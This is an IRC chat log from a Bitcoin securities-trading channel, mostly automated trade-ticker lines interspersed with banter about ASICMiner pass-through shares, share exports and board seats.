mircea_popescu, you mean like i could model anything ? Jul 23 02:18:28 im in a meeting now Jul 23 02:18:38 er, wrong win Jul 23 02:20:47 Apocalyptic huh ? Jul 23 02:22:18 [HAVELOCK] [AM100] 5 @ 0.0441 = 0.2205 BTC [+] Jul 23 02:22:38 [HAVELOCK] [AM100] 5 @ 0.0441 = 0.2205 BTC [+] Jul 23 02:22:53 regarding your question with the bunch of dough, don't see how the virus dub is mentionning fits in, unless it's some symbolic "dough" you're referring to Jul 23 02:23:44 dough means money. Jul 23 02:25:06 was thinking about that "malleable paste" instead Jul 23 02:25:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.045911 BTC [+] Jul 23 02:25:51 [BTCTC] [AMC-PT] 580 @ 0.004051 = 2.3496 BTC [-] Jul 23 02:26:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.045911 = 0.1377 BTC [+] Jul 23 02:27:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.045601 = 0.0912 BTC [-] Jul 23 02:27:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003339 BTC [-] Jul 23 02:27:24 bread isnt going to cut it for my virus delivery Jul 23 02:27:33 [BTCTC] [TAT.ASICMINER] 20 @ 0.0456 = 0.912 BTC [-] Jul 23 02:27:41 risk of missing all those paleo fucktards like Diablo-D3 Jul 23 02:28:04 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003698 = 0.0074 BTC [+] Jul 23 02:28:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.0455 = 0.1365 BTC [-] Jul 23 02:29:00 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003698 = 0.037 BTC [+] Jul 23 02:29:46 [BTCTC] [DMS.SELLING] 7 @ 0.025687 = 0.1798 BTC [+] Jul 23 02:29:47 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003698 = 0.037 BTC [+] Jul 23 02:30:26 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003698 = 0.0074 BTC [+] Jul 23 02:30:49 [BTCTC] [DMS.SELLING] 42 @ 0.025688 = 1.0789 BTC [+] Jul 23 02:31:01 [BTCTC] [AMC-PT] 40 @ 0.004051 = 0.162 BTC [-] Jul 23 02:31:36 how would that be relevant anyway ? i never thought about it, i'll keep enough money to be sure i'll never have to work again while being able to afford a decent livestyle, as for the rest i have no clue Jul 23 02:32:38 [BTCTC] [AMC-PT] 29 @ 0.004051 = 0.1175 BTC [-] Jul 23 02:36:35 [BTCTC] [AMC-PT] 500 @ 0.00412 = 2.06 BTC [+] Jul 23 02:36:50 [BTCTC] [AMC-PT] 1 @ 0.004124 BTC [+] Jul 23 02:36:58 [BTCTC] [B.YABMC] 1 @ 0.003099 BTC [+] Jul 23 02:37:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.045911 BTC [+] Jul 23 02:37:33 [BTCTC] [AMC-PT] 279 @ 0.004124 = 1.1506 BTC [+] Jul 23 02:38:38 [BTCTC] [AMC-PT] 425 @ 0.004125 = 1.7531 BTC [+] Jul 23 02:39:31 [BTCTC] [AMC-PT] 5 @ 0.0041 = 0.0205 BTC [-] Jul 23 02:39:56 I've got a bunch of world domination plans pencilled in but working for another global megacorp for the last year I'm all eviled out tbh Jul 23 02:40:06 [BTCTC] [AMC-PT] 8 @ 0.0041 = 0.0328 BTC [-] Jul 23 02:40:13 I'd probably just do some upgrades to the floating island fortress then go fishing Jul 23 02:40:46 [BTCTC] [DMS.SELLING] 1 @ 0.025688 BTC [+] Jul 23 02:41:22 libertards dreaming living in autarky heh Jul 23 02:42:50 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003341 = 0.0334 BTC [-] Jul 23 02:42:57 [BTCTC] [AMC-PT] 1000 @ 0.0041 = 4.1 BTC [-] Jul 23 02:43:13 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.00334 = 0.0434 BTC [-] Jul 23 02:43:24 [BTCTC] [AMC-PT] 85 @ 0.004051 = 0.3443 BTC [-] Jul 23 02:43:26 [BTCTC] [AMC-PT] 170 @ 0.00405 = 0.6885 BTC [-] Jul 23 02:43:28 [BTCTC] [AMC-PT] 2245 @ 0.004035 = 9.0586 BTC [-] Jul 23 02:43:48 [BTCTC] [DMS.SELLING] 3 @ 0.025688 = 0.0771 BTC [+] Jul 23 02:44:55 [BTCTC] [COGNITIVE] 4 @ 0.8 = 3.2 BTC [-] Jul 23 02:44:59 [BTCTC] [AMC-PT] 1000 @ 0.004035 = 4.035 BTC [-] Jul 23 02:45:49 [BTCTC] [AMC-PT] 980 @ 0.004035 = 3.9543 BTC [-] Jul 23 02:46:38 [BTCTC] [AMC-PT] 170 @ 0.004099 = 0.6968 BTC [+] Jul 23 02:48:34 [MPEX] [S.MPOE] 1300 @ 0.00080186 = 1.0424 BTC [+] Jul 23 02:49:26 [BTCTC] [AMC-PT] 85 @ 0.004098 = 0.3483 BTC [-] Jul 23 02:50:27 [HAVELOCK] [SMG] 1 @ 0.000269 BTC [+] Jul 23 02:50:37 [BTCTC] [AMC-PT] 150 @ 0.004098 = 0.6147 BTC [-] Jul 23 02:51:01 [BTCTC] [AMC-PT] 900 @ 0.004098 = 3.6882 BTC [-] Jul 23 02:53:57 [HAVELOCK] [HIM] 1 @ 0.255 BTC [+] Jul 23 02:54:46 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003695 = 0.037 BTC [+] Jul 23 02:55:05 [BTCTC] [AMC-PT] 10 @ 0.004001 = 0.04 BTC [-] Jul 23 02:55:07 [BTCTC] [AMC-PT] 990 @ 0.004 = 3.96 BTC [-] Jul 23 02:55:26 [BTCTC] [BITVPS] 1 @ 0.002159 BTC [+] Jul 23 02:55:55 [BTCTC] [AMC-PT] 1 @ 0.004098 BTC [+] Jul 23 02:57:32 [BTCTC] [AMC-PT] 1500 @ 0.004 = 6 BTC [-] Jul 23 02:58:01 [BTCTC] [BITVPS] 1 @ 0.002159 BTC [+] Jul 23 02:58:47 [BTCTC] [AMC-PT] 53 @ 0.004 = 0.212 BTC [-] Jul 23 02:58:49 [BTCTC] [AMC-PT] 47 @ 0.004 = 0.188 BTC [-] Jul 23 02:59:09 [BTCTC] [AMC-PT] 203 @ 0.004 = 0.812 BTC [-] Jul 23 02:59:10 [BTCTC] [AMC-PT] 100 @ 0.00395 = 0.395 BTC [-] Jul 23 03:00:50 [BTCTC] [AMC-PT] 100 @ 0.00394 = 0.394 BTC [-] Jul 23 03:01:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.045912 BTC [+] Jul 23 03:01:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.04594 BTC [+] Jul 23 03:01:45 [BTCTC] [TAT.ASICMINER] 8 @ 0.045983 = 0.3679 BTC [+] Jul 23 03:03:36 [BTCTC] [AMC-PT] 1050 @ 0.003851 = 4.0436 BTC [-] Jul 23 03:06:53 [BTCTC] [BFMINES] 250 @ 0.003999 = 0.9998 BTC [-] Jul 23 03:07:32 "I bought AM100 shares at havelock and I was wondering if they were convertable to AM1 shares in Havelock?" a lot lately. getting closer and closer to a canned reply of RTFM... Jul 23 03:08:00 oh no, I'd LOVE to trade in these 5% mgmt fee shares for 0% fee exportable ones! Jul 23 03:08:28 [BTCTC] [AMC-PT] 38 @ 0.00387 = 0.1471 BTC [+] Jul 23 03:08:42 lol Jul 23 03:08:44 [BTCTC] [B.YABMC] 1 @ 0.003099 BTC [+] Jul 23 03:09:16 some aspiring millionaires coming up with grand schemes Jul 23 03:09:37 [BTCTC] [B.YABMC] 2 @ 0.0027 = 0.0054 BTC [-] Jul 23 03:10:32 [BTCTC] [CRYPTO-TRADE] 1 @ 0.192001 BTC [-] Jul 23 03:11:27 [BTCTC] [GSDPT] 1 @ 0.003156 BTC [-] Jul 23 03:12:04 [BTCTC] [PAJKA.BOND] 1 @ 0.041 BTC [-] Jul 23 03:12:57 [BTCTC] [TAT.ASICMINER] 27 @ 0.045981 = 1.2415 BTC [-] Jul 23 03:13:09 [BTCTC] [PAJKA.BOND] 1 @ 0.04 BTC [-] Jul 23 03:14:05 [BTCTC] [PAJKA.BOND] 1 @ 0.039002 BTC [-] Jul 23 03:14:26 [BTCTC] [TAT.ASICMINER] 6 @ 0.045981 = 0.2759 BTC [-] Jul 23 03:15:10 [BTCTC] [TAT.ASICMINER] 12 @ 0.045911 = 0.5509 BTC [-] Jul 23 03:15:13 Theoretically, if the price of 100 AM100 was higher than the price of an AM1, you could make more than the 5% dividend by trading one for the other. But some force would need to keep the AM100 values at a higher price Jul 23 03:15:46 [BTCTC] [TAT.ASICMINER] 22 @ 0.045501 = 1.001 BTC [-] Jul 23 03:16:28 Though, they wouldn't trade you if that was the case, they'd just sell the shares themselves and buy an AM1 Jul 23 03:16:30 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.003501 = 0.021 BTC [-] Jul 23 03:16:37 hrm Jul 23 03:19:01 http://chuckpalahniuk.net/news/chuck-palahniuk-announces-a-graphic-novel-sequel-to-fight-club Jul 23 03:19:04 Chuck Palahniuk Announces A Graphic Novel Sequel To FIGHT CLUB | The Cult Jul 23 03:19:34 there's more at play for me anyway, the incentive to allow AM100 exports is very low Jul 23 03:20:05 firstly, I wouldnt even consider it other than for any shares in the PTs over 5000 Jul 23 03:20:29 even then I'd like do a tax like 106 AM100 for 1 AM1 Jul 23 03:20:38 (or any whole-share) Jul 23 03:20:41 but even then Jul 23 03:20:50 I am inclined not to export Jul 23 03:21:08 because of the risk that Friedcat opens an independent exchange service Jul 23 03:21:09 Fractional shares seem messy to deal with Jul 23 03:21:13 if he did such Jul 23 03:21:22 then I'd be the only PT left Jul 23 03:22:10 It would have been smart of him to launch such a thing, with all the volume in trades.. Jul 23 03:22:34 if so many ask you to convert am100 shares.. why don't you adapt and do it for a juicy fee? Jul 23 03:22:55 Juicy fee = pitchforks, fire Jul 23 03:23:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0036 BTC [+] Jul 23 03:23:36 People cry enough over 5% of .02 Jul 23 03:23:49 i just stated why dex Jul 23 03:23:56 <[\\\]> 5% is 5%, regardless of net Jul 23 03:24:01 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00362 BTC [+] Jul 23 03:24:05 to protect my board seat and against AM alt exchange Jul 23 03:24:46 <[\\\]> What do the board seats actually do these days besides allow for a little insider trading? Jul 23 03:25:05 [BTCTC] [AMC-PT] 10 @ 0.003835 = 0.0384 BTC [-] Jul 23 03:25:07 [BTCTC] [AMC-PT] 175 @ 0.003999 = 0.6998 BTC [+] Jul 23 03:25:16 It would have been smart of him to launch such a thing, with all the volume in trades.. << he promised he was going to do it, before going live Jul 23 03:25:16 fair enough. do many people actually do an export? Jul 23 03:25:20 ie, months ago. Jul 23 03:25:31 after all, anything's easy to do. Jul 23 03:25:37 then he failed and now it's unmentionable. Jul 23 03:25:51 fair enough. do many people actually do an export? <<< generally, no Jul 23 03:25:58 <[\\\]> sorta how my question now goes unswered? Jul 23 03:26:08 so far only BitFunder has taken big hits from exports Jul 23 03:26:20 and that's largely from me buying there Jul 23 03:26:35 it was so cheap their for so long Jul 23 03:26:39 was hard not to Jul 23 03:26:44 [HAVELOCK] [SDSTM] 4 @ 0.011 = 0.044 BTC [+] Jul 23 03:26:56 there* Jul 23 03:27:13 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003581 = 0.0358 BTC [-] Jul 23 03:27:21 that was to expect. without nearly realtime-transfer arbitrage is not possible and thus there are not many reasons for an export at all Jul 23 03:27:22 [\\\] "board seats" are the practical equivalent of las vegas steaks. Jul 23 03:27:33 [BTCTC] [AMC-PT] 2 @ 0.003999 = 0.008 BTC [+] Jul 23 03:27:36 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003581 = 0.0358 BTC [-] Jul 23 03:27:53 <[\\\]> clearly Jul 23 03:27:56 dexX7 why'd you expect joe q public to be doing DR arbitrage anyway ? Jul 23 03:27:58 [BTCTC] [AMC-PT] 936 @ 0.003835 = 3.5896 BTC [-] Jul 23 03:28:07 [BTCTC] [BASIC-MINING] 1 @ 0.62 BTC [+] Jul 23 03:28:07 what's this, fantasylandia? Jul 23 03:28:15 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003581 = 0.0358 BTC [-] Jul 23 03:28:21 creating an exchange means a real, brick and mortar web presence Jul 23 03:28:27 harder to cut and run Jul 23 03:28:28 people always complain about stuff like "bf suxx, it's always lower than btct" Jul 23 03:28:36 well the other PTs mostly give an illusion of arb potential Jul 23 03:28:43 forum account and gmail address is smart Jul 23 03:28:50 BTCT slow rolls them, including BTC withdrawals Jul 23 03:28:52 [BTCTC] [AMC-PT] 7 @ 0.003999 = 0.028 BTC [+] Jul 23 03:29:02 and BF requires 250 minimum shares to export Jul 23 03:29:24 AM1 is actually the closest thing Jul 23 03:29:34 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003581 = 0.0358 BTC [-] Jul 23 03:29:37 <[\\\]> http://virtualminingcorp.com/shop1/index.php?id_product=10&controller=product&ad=5#/fh_exp_case_16_pcie_slots-6_expansions_cases/fh_one_m256_256_gh_s_module-96_fh_one_m256_256_gh_s_module Jul 23 03:29:39 because I will import any type of PT whole-share too Jul 23 03:29:43 Fast-Hash-One 256 GH/s-24.576 TH/s Jul 23 03:29:44 and I'm like always around Jul 23 03:29:44 <[\\\]> only $500K Jul 23 03:29:53 [\\\] 2 weeks away ? Jul 23 03:30:03 <[\\\]> Coming soon(tm) Jul 23 03:30:04 lol Jul 23 03:30:06 wtf Jul 23 03:30:10 i mena really Jul 23 03:30:11 <[\\\]> oh look, I'm not on ignore Jul 23 03:30:15 mean* Jul 23 03:30:16 <[\\\]> just chose to ignore my question Jul 23 03:30:17 <[\\\]> good to know Jul 23 03:30:40 [BTCTC] [DMS.SELLING] 1 @ 0.025688 BTC [+] Jul 23 03:30:57 <[\\\]> What's the point of a board seat for a passthrough if they refuse to talk about it? Jul 23 03:31:26 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003581 = 0.0358 BTC [-] Jul 23 03:32:25 <[\\\]> I rest my case. Jul 23 03:32:26 they should receive developer boards, but i never heard from someone who received one Jul 23 03:33:01 dexX7 that was the original test boards promise, revamped Jul 23 03:33:03 [\\\]: think the pirate cabal Jul 23 03:33:05 [BTCTC] [AMC-PT] 142 @ 0.003999 = 0.5679 BTC [+] Jul 23 03:33:12 they also blew that one but nobody cared as they actually seem to hash, so Jul 23 03:33:24 in the meantime boardmembers do stuff like this: http://www.lovethetruth.com/jis_images/cremation_of_care.jpg Jul 23 03:33:30 [\\\]: helps to have a priviledged few out there shilling and feeling special Jul 23 03:33:50 <[\\\]> dub, been there, done that, got screwed like the rest. Jul 23 03:34:20 yea Jul 23 03:35:58 <[\\\]> I'm seriously interested how having any of the passthrough operators as board members has actually benefited any of the passthrough buyers Jul 23 03:36:17 <[\\\]> it would actually seem to put the operator in a better position to screw the buyer. Jul 23 03:36:29 pankkake parseval parseval_ phish- pigeons pizzaman1337 poggy Populus PsychoticBoy publio Pucilowski Jul 23 03:36:35 it makes it seem more legitimate to te buyer Jul 23 03:36:44 [\\\] subjectively, the buyer gets to feel even closer to the object of his adoratiobn Jul 23 03:36:54 it doesnt benefit shareholders in any way Jul 23 03:37:10 like mp said, there was a hope for hardware benefits Jul 23 03:37:14 which has yet to materialize Jul 23 03:37:21 maybe theyll do it for gen2 Jul 23 03:37:23 maybe never Jul 23 03:37:27 <[\\\]> it's a waste of everyone's time Jul 23 03:37:31 <[\\\]> to get a board Jul 23 03:37:35 either way *I* enjoy having a board seat Jul 23 03:37:35 <[\\\]> they won't hash much Jul 23 03:37:36 just replace 'board member' with 'pirate vegas party attendee' and answer these questions yourself Jul 23 03:37:42 for misc reasons Jul 23 03:37:43 <[\\\]> not in the context of total network hash Jul 23 03:37:53 <[\\\]> "misc reasons" being insider trading. Jul 23 03:37:53 [HAVELOCK] [SMG] 299 @ 0.000269 = 0.0804 BTC [+] Jul 23 03:38:04 <[\\\]> what other reason are there, really? Jul 23 03:38:05 odds are that even if they do pass out hardware to us Jul 23 03:38:05 <[\\\]> ego? Jul 23 03:38:09 the best thing would be to sell it Jul 23 03:38:15 and do a 1-time div Jul 23 03:38:33 <[\\\]> dub, I didn't get a steak dinner in vegas Jul 23 03:38:36 <[\\\]> I feel left out Jul 23 03:39:16 [\\\] at least you didn't end up buying a ton of discounted "debt" a week after. Jul 23 03:39:23 <[\\\]> heh Jul 23 03:39:27 <[\\\]> did you? Jul 23 03:39:44 <[\\\]> I always knew you were a flea market type of guy Jul 23 03:39:51 no i didn't lmao Jul 23 03:40:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.045977 = 0.1379 BTC [+] Jul 23 03:40:14 you kinda did Jul 23 03:40:25 ala mr harnett Jul 23 03:40:33 [BTCTC] [COGNITIVE] 1 @ 0.8 BTC [-] Jul 23 03:40:47 <[\\\]> what happened there? Jul 23 03:40:51 dub nah, it's a specific member of some mostly defunct cool guy club. Jul 23 03:40:54 not intentionally of course Jul 23 03:41:09 harnett was iirc june or some shirt. Jul 23 03:42:07 [\\\]: Ph had a really neat definately not pirate related investment fund that turned out to be a way to buy his own pirate debt Jul 23 03:42:43 what i bought with harnett was the silencing of that idiot, who at the time was if you recall running all over the forum with HIS WIFE throwing around "ratings" and whatnot. Jul 23 03:42:53 500 btc judiciously spent. Jul 23 03:43:15 [BTCTC] [B.YABMC] 1 @ 0.0027 BTC [-] Jul 23 03:44:01 indeed Jul 23 03:44:55 for all the wailing children on buttcointalk, history will look kindly on MP Jul 23 03:45:58 [MPEX] [S.MPOE] 8900 @ 0.00080469 = 7.1617 BTC [+] Jul 23 03:46:15 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003509 = 0.3509 BTC [-] Jul 23 03:46:17 [\\\] you can't possibly have missed the ubercool thread where katz went nutz. Jul 23 03:46:28 birthplace of the double cherry truck etc. Jul 23 03:50:14 [BTCTC] [DMS.MINING] 160 @ 0.0148 = 2.368 BTC [-] Jul 23 03:53:33 [BTCTC] [ASICMINER-PT] 1 @ 4.714 BTC [+] Jul 23 03:53:35 [BTCTC] [ASICMINER-PT] 1 @ 4.714997 BTC [+] Jul 23 03:53:37 [BTCTC] [ASICMINER-PT] 7 @ 4.714998 = 33.005 BTC [+] Jul 23 03:55:19 [BTCTC] [COGNITIVE] 20 @ 0.8 = 16 BTC [-] Jul 23 03:56:58 [BTCTC] [S.MPOE-PT] 68 @ 0.000945 = 0.0643 BTC [+] Jul 23 03:57:00 [BTCTC] [S.MPOE-PT] 32 @ 0.000946 = 0.0303 BTC [+] Jul 23 03:57:48 <[\\\]> mircea_popescu: I did. Jul 23 04:08:28 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [-] Jul 23 04:15:23 [BTCTC] [COGNITIVE] 5 @ 0.8 = 4 BTC [-] Jul 23 04:18:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003339 BTC [-] Jul 23 04:21:46 [HAVELOCK] [SDSTM] 9 @ 0.01095 = 0.0986 BTC [-] Jul 23 04:22:37 [BTCTC] [AMC-PT] 9 @ 0.003999 = 0.036 BTC [+] Jul 23 04:24:56 [HAVELOCK] [SMG] 720 @ 0.00027 = 0.1944 BTC [+] Jul 23 04:25:12 wow Jul 23 04:26:11 pankkake parseval parseval_ phish- pigeons pizzaman1337 poggy Populus PsychoticBoy publio Pucilowski Jul 23 04:26:14 [\\\] https://bitcointalk.org/index.php?topic=121915.0 Jul 23 04:27:02 [BTCTC] [TAT.ASICMINER] 22 @ 0.04596 = 1.0111 BTC [-] Jul 23 04:29:28 [BTCTC] [AMC-PT] 499 @ 0.004085 = 2.0384 BTC [+] Jul 23 04:29:30 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [+] Jul 23 04:30:36 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jul 23 04:31:05 [BTCTC] [LTC-ATF.B2] 1 @ 0.010289 BTC [+] Jul 23 04:31:43 mircea_popescu: wow what? Jul 23 04:32:10 [BTCTC] [AMC-PT] 278 @ 0.004 = 1.112 BTC [-] Jul 23 04:32:12 [BTCTC] [AMC-PT] 1 @ 0.003962 BTC [-] Jul 23 04:32:30 thestringpuller!*@* added to ignore list. Jul 23 04:32:56 is it just me or is www.btct.co really slow atm? Jul 23 04:34:45 [BTCTC] [TAT.ASICMINER] 18 @ 0.04596 = 0.8273 BTC [-] Jul 23 04:35:16 [BTCTC] [ASICMINER-PT] 1 @ 4.718 BTC [+] Jul 23 04:39:22 [MPEX] [S.MPOE] 16300 @ 0.00080383 = 13.1024 BTC [-] Jul 23 04:39:29 [MPEX] [S.MPOE] 2680 @ 0.00080469 = 2.1566 BTC [+] Jul 23 04:39:31 [MPEX] [S.MPOE] 6522 @ 0.00080749 = 5.2664 BTC [+] Jul 23 04:42:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.045983 = 0.1379 BTC [+] Jul 23 04:57:45 [BTCTC] [AMC-PT] 13 @ 0.004082 = 0.0531 BTC [+] Jul 23 04:58:39 [HAVELOCK] [SMG] 100 @ 0.00027288 = 0.0273 BTC [+] Jul 23 04:59:29 [BTCTC] [ASICMINER-PT] 1 @ 4.693501 BTC [-] Jul 23 05:02:46 [HAVELOCK] [SMG] 400 @ 0.00027288 = 0.1092 BTC [+] Jul 23 05:03:27 [BTCTC] [AMC-PT] 250 @ 0.004 = 1 BTC [-] Jul 23 05:06:48 [BTCTC] [AMC-PT] 255 @ 0.00391 = 0.9971 BTC [-] Jul 23 05:06:51 [BTCTC] [AMC-PT] 1500 @ 0.003902 = 5.853 BTC [-] Jul 23 05:06:54 [BTCTC] [AMC-PT] 10 @ 0.003901 = 0.039 BTC [-] Jul 23 05:06:58 [BTCTC] [AMC-PT] 2150 @ 0.0039 = 8.385 BTC [-] Jul 23 05:07:20 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003619 = 0.0362 BTC [+] Jul 23 05:10:22 [MPEX] [S.MPOE] 1000 @ 0.00080749 = 0.8075 BTC [+] Jul 23 05:10:35 [BTCTC] [AMC-PT] 1000 @ 0.004 = 4 BTC [+] Jul 23 05:11:26 [BTCTC] [AMC-PT] 150 @ 0.004 = 0.6 BTC [+] Jul 23 05:11:28 [BTCTC] [AMC-PT] 25 @ 0.004 = 0.1 BTC [+] Jul 23 05:15:29 [MPEX] [S.MPOE] 3000 @ 0.00080749 = 2.4225 BTC [+] Jul 23 05:16:27 [BTCTC] [TAT.ASICMINER] 14 @ 0.045983 = 0.6438 BTC [+] Jul 23 05:17:05 someday i will understand btc assets, but not today. why hasn't the price of tat.virtualmine gone down much over the last 6 weeks while the dividend has dropped nearly by half? who knows. not me. Jul 23 05:17:35 MtGox BTCUSD ticker | Best bid: 92.13767, Best ask: 92.53999, Bid-ask spread: 0.40232, Last trade: 92.13768, 24 hour volume: 9462.49245793, 24 hour low: 90.00000, 24 hour high: 93.00000, 24 hour vwap: 91.63500 Jul 23 05:19:21 [HAVELOCK] [SDSTM] 7 @ 0.011 = 0.077 BTC [+] Jul 23 05:20:50 [HAVELOCK] [AM100] 2 @ 0.0441 = 0.0882 BTC [+] Jul 23 05:24:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.04596 = 0.2298 BTC [-] Jul 23 05:25:01 [MPEX] [S.MPOE] 1374 @ 0.00080749 = 1.1095 BTC [+] Jul 23 05:25:03 [MPEX] [S.MPOE] 7482 @ 0.000808 = 6.0455 BTC [+] Jul 23 05:25:08 [BTCTC] [AMC-PT] 50 @ 0.004074 = 0.2037 BTC [+] Jul 23 05:26:13 [BTCTC] [TAT.ASICMINER] 12 @ 0.045983 = 0.5518 BTC [+] Jul 23 05:29:02 [BTCTC] [TAT.ASICMINER] 11 @ 0.045503 = 0.5005 BTC [-] Jul 23 05:31:06 [BTCTC] [CRYPTO-TRADE] 3 @ 0.199999 = 0.6 BTC [+] Jul 23 05:31:07 [BTCTC] [AMC-PT] 29 @ 0.004 = 0.116 BTC [-] Jul 23 05:32:04 [BTCTC] [AMC-PT] 5 @ 0.004 = 0.02 BTC [-] Jul 23 05:34:27 mike_c not quite efficient yet. Jul 23 05:34:57 [HAVELOCK] [AM100] 2 @ 0.0441 = 0.0882 BTC [+] Jul 23 05:35:04 [BTCTC] [ASICMINER-PT] 1 @ 4.719999 BTC [+] Jul 23 05:35:06 [BTCTC] [ASICMINER-PT] 1 @ 4.72 BTC [+] Jul 23 05:37:28 [BTCTC] [AMC-PT] 2 @ 0.003999 = 0.008 BTC [-] Jul 23 05:37:54 yeah, but that's pretty far from efficient. idk. confusing. Jul 23 05:42:54 <[\\\]> mircea_popescu, I knew about that Jul 23 05:43:02 <[\\\]> I thought you were implying I had missed something else. Jul 23 05:43:07 <[\\\]> I don't frequent that forum much anymore. Jul 23 05:46:51 nah Jul 23 05:50:17 [BTCTC] [COG.F] 1 @ 10.5 BTC [-] Jul 23 05:51:06 [BTCTC] [RSM] 40 @ 0.0168 = 0.672 BTC [+] Jul 23 05:51:08 [BTCTC] [RSM] 3 @ 0.016809 = 0.0504 BTC [+] Jul 23 05:52:53 [BTCTC] [AMC-PT] 1 @ 0.003877 BTC [-] Jul 23 05:52:55 [BTCTC] [AMC-PT] 2 @ 0.003876 = 0.0078 BTC [-] Jul 23 05:53:55 [BTCTC] [AMC-PT] 12 @ 0.003873 = 0.0465 BTC [-] Jul 23 05:56:44 [BTCTC] [AMC-PT] 150 @ 0.003873 = 0.581 BTC [-] Jul 23 05:56:46 [BTCTC] [AMC-PT] 112 @ 0.003872 = 0.4337 BTC [-] Jul 23 05:57:06 [BTCTC] [COGNITIVE] 1 @ 0.785006 BTC [-] Jul 23 05:57:24 [BTCTC] [COGNITIVE] 1 @ 0.785005 BTC [-] Jul 23 05:57:28 [BTCTC] [ASICMINER-PT] 2 @ 4.685001 = 9.37 BTC [-] Jul 23 05:58:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.04551 = 0.182 BTC [+] Jul 23 06:00:41 [BTCTC] [DMS.PURCHASE] 2 @ 0.039422 = 0.0788 BTC [+] Jul 23 06:00:59 [BTCTC] [AMC-PT] 100 @ 0.003993 = 0.3993 BTC [+] Jul 23 06:01:01 [BTCTC] [AMC-PT] 500 @ 0.003995 = 1.9975 BTC [+] Jul 23 06:01:03 [BTCTC] [AMC-PT] 100 @ 0.003996 = 0.3996 BTC [+] Jul 23 06:01:06 [BTCTC] [AMC-PT] 76 @ 0.003997 = 0.3038 BTC [+] Jul 23 06:01:08 [BTCTC] [AMC-PT] 1000 @ 0.003999 = 3.999 BTC [+] Jul 23 06:02:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.045975 = 0.4598 BTC [+] Jul 23 06:04:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0035 BTC [-] Jul 23 06:04:34 [BTCTC] [AMC-PT] 202 @ 0.004068 = 0.8217 BTC [+] Jul 23 06:04:56 [HAVELOCK] [AM100] 2 @ 0.0441 = 0.0882 BTC [+] Jul 23 06:07:05 [BTCTC] [COGNITIVE] 1 @ 0.800599 BTC [+] Jul 23 06:07:55 [BTCTC] [COGNITIVE] 19 @ 0.8006 = 15.2114 BTC [+] Jul 23 06:08:03 [HAVELOCK] [AM100] 1 @ 0.04429998 BTC [+] Jul 23 06:08:57 [MPEX] [S.MPOE] 31650 @ 0.00081137 = 25.6799 BTC [+] Jul 23 06:09:37 [BTCTC] [DMS.MINING] 40 @ 0.0148 = 0.592 BTC [-] Jul 23 06:11:12 [MPEX] [S.MPOE] 5788 @ 0.00080984 = 4.6874 BTC [-] Jul 23 06:11:13 [BTCTC] [DMS.SELLING] 53 @ 0.025688 = 1.3615 BTC [+] Jul 23 06:11:45 [HAVELOCK] [SMG] 1906 @ 0.0002712 = 0.5169 BTC [-] Jul 23 06:11:56 [HAVELOCK] [SMG] 454 @ 0.0002711 = 0.1231 BTC [-] Jul 23 06:15:55 [HAVELOCK] [AM100] 1 @ 0.04429998 BTC [+] Jul 23 06:16:21 [HAVELOCK] [AM100] 2 @ 0.04429999 = 0.0886 BTC [+] Jul 23 06:18:57 hi Jul 23 06:19:10 yes hello Jul 23 06:19:24 evening all Jul 23 06:21:36 [BTCTC] [BITVPS] 1 @ 0.002077 BTC [-] Jul 23 06:21:38 [BTCTC] [BITVPS] 444 @ 0.002079 = 0.9231 BTC [+] Jul 23 06:21:38 [BTCTC] [BITVPS] 1 @ 0.0021 BTC [+] Jul 23 06:21:40 [BTCTC] [BITVPS] 1 @ 0.00216 BTC [+] Jul 23 06:24:19 [HAVELOCK] [AM100] 4 @ 0.04429999 = 0.1772 BTC [+] Jul 23 06:25:22 KSguy hi Jul 23 06:25:47 [HAVELOCK] [SMG] 1000 @ 0.0002712 = 0.2712 BTC [+] Jul 23 06:26:04 [HAVELOCK] [SMG] 906 @ 0.0002712 = 0.2457 BTC [+] Jul 23 06:26:35 [HAVELOCK] [SMG] 819 @ 0.0002711 = 0.222 BTC [-] Jul 23 06:26:59 [MPEX] [S.MG] 3250 @ 0.000205 = 0.6663 BTC [-] Jul 23 06:27:01 [MPEX] [S.MG] 25555 @ 0.0002 = 5.111 BTC [-] Jul 23 06:27:02 [MPEX] [S.MG] 15195 @ 0.000191 = 2.9022 BTC [-] Jul 23 06:27:03 mircea_popescu: hows it going Jul 23 06:27:13 so so. Jul 23 06:27:40 [HAVELOCK] [SMG] 3000 @ 0.0002711 = 0.8133 BTC [-] Jul 23 06:27:43 well it is monday so.. it'll be better in the morning Jul 23 06:27:44 http://gapingvoid.com/2004/03/25/the-sex-cash-theory/ Jul 23 06:27:47 [HAVELOCK] [AM100] 10 @ 0.04429999 = 0.443 BTC [+] Jul 23 06:27:47 the sex & cash theory | gapingvoid Jul 23 06:28:04 [HAVELOCK] [AM100] 10 